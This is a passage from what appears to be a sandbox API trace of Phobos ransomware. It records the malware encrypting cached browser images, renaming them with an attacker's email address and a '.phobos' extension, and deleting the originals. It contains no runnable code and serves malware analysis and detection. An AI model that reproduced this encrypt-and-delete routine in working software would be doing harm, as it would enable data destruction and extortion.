pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.481] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9833) returned 1 [0186.481] CloseHandle (hObject=0x178) returned 1 [0186.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg")) returned 0x2020 [0186.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.482] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.482] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.482] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.482] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.482] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2669, lpOverlapped=0x0) returned 1 [0186.553] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2670, dwBufLen=0x2670 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2670) returned 1 [0186.553] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2670, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2670, lpOverlapped=0x0) returned 1 [0186.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0186.554] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.554] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.554] CryptDestroyKey (hKey=0xa32c68) returned 1 [0186.554] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.554] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.554] CloseHandle (hObject=0x178) returned 1 [0186.554] CloseHandle (hObject=0x14c) returned 1 [0186.555] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg")) returned 1 [0186.555] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.556] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12259) returned 1 [0186.556] CloseHandle (hObject=0x14c) returned 1 [0186.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg")) returned 0x2020 [0186.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.557] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.557] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.557] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.557] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2fe3, lpOverlapped=0x0) returned 1 [0186.707] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2ff0, dwBufLen=0x2ff0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2ff0) returned 1 [0186.707] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2ff0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2ff0, lpOverlapped=0x0) returned 1 [0186.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0186.710] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.710] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.710] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.710] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.711] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.711] CloseHandle (hObject=0x14c) returned 1 [0186.711] CloseHandle (hObject=0x178) returned 1 [0186.711] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg")) returned 1 [0186.712] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.713] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2245) returned 1 [0186.713] CloseHandle (hObject=0x178) returned 1 [0186.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg")) returned 0x2020 [0186.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.713] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.713] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.714] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.714] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.714] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8c5, lpOverlapped=0x0) returned 1 [0186.735] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8d0, dwBufLen=0x8d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8d0) returned 1 [0186.735] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8d0, lpOverlapped=0x0) returned 1 [0186.736] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0186.736] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.736] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.736] CryptDestroyKey (hKey=0xa32c68) returned 1 [0186.736] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.736] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.737] CloseHandle (hObject=0x178) returned 1 [0186.737] CloseHandle (hObject=0x14c) returned 1 [0186.737] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeekvv[1].jpg")) returned 1 [0186.738] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.739] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=61184) returned 1 [0186.739] CloseHandle (hObject=0x14c) returned 1 [0186.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png")) returned 0x2020 [0186.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.739] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.739] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.740] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.740] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.740] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xef00, lpOverlapped=0x0) returned 1 [0186.775] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xef10, dwBufLen=0xef10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xef10) returned 1 [0186.775] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xef10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xef10, lpOverlapped=0x0) returned 1 [0186.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0186.800] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.800] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.800] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.800] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.800] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.800] CloseHandle (hObject=0x14c) returned 1 [0186.800] CloseHandle (hObject=0x178) returned 1 [0186.863] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeend8[1].png")) returned 1 [0186.864] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.865] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2519) returned 1 [0186.865] CloseHandle (hObject=0x140) returned 1 [0186.865] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg")) returned 0x2020 [0186.865] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.866] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.866] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeez0k[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.866] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: 